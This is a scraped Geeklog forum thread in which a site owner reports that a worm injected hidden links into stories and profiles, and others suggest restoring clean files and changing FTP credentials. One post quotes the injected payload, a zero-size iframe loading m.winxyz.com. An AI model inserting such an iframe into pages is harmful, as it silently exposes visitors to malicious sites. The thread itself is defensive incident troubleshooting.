Welcome to Geeklog, Anonymous Tuesday, December 24 2024 @ 09:10 am EST
Geeklog Forums
worm infection
ismael
Anonymous
Hi,
last night i sufered a worm infection. I use geeklok 1.4.1. All my stories and comments has an m.winxyz.com reference.
Thank you,
ismael
last night i sufered a worm infection. I use geeklok 1.4.1. All my stories and comments has an m.winxyz.com reference.
Thank you,
ismael
10
16
Quote
ismael
Anonymous
every new user has this web in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>
12
18
Quote
ismael
Anonymous
can it be due to fckeditor sql injection?
17
14
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.
Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.
Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.
bye, Dirk
Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.
Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.
bye, Dirk
15
13
Quote
ismael
Anonymous
more info about this.
i detected the problem become from a user that has stort admin privilegies. It seems that this user has a troyan that take access to my geeklog site and modifies his stories.
now this user is suspended, but i'm really worried about this situation if the security of my site depends on my users security.
This morning, all accounts on my site have his profile modified, also my profile as admin. I can't explain myself.
The geeklog files are not been modified.
Thank you,
ismael
i detected the problem become from a user that has stort admin privilegies. It seems that this user has a troyan that take access to my geeklog site and modifies his stories.
now this user is suspended, but i'm really worried about this situation if the security of my site depends on my users security.
This morning, all accounts on my site have his profile modified, also my profile as admin. I can't explain myself.
The geeklog files are not been modified.
Thank you,
ismael
19
13
Quote
Status: offline
guganbl
Forum User
Chatty
Registered: 05/12/07
Posts: 57
I had a similar problem some time ago. The reason was compromised ftp account.
Person that used that account had a virus and from that moment something started inserting linest that pointed to other infected sites in my gl. I downloaded complete gl, and scanned all files to fine code, and than replaced those files.
Faster way to deal with this is to replace all files , and use same old DB as Dirk told you.
And change password on your ftp account, just in case
Person that used that account had a virus and from that moment something started inserting linest that pointed to other infected sites in my gl. I downloaded complete gl, and scanned all files to fine code, and than replaced those files.
Faster way to deal with this is to replace all files , and use same old DB as Dirk told you.
And change password on your ftp account, just in case
21
13
Quote
All times are EST. The time is now 09:10 am.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content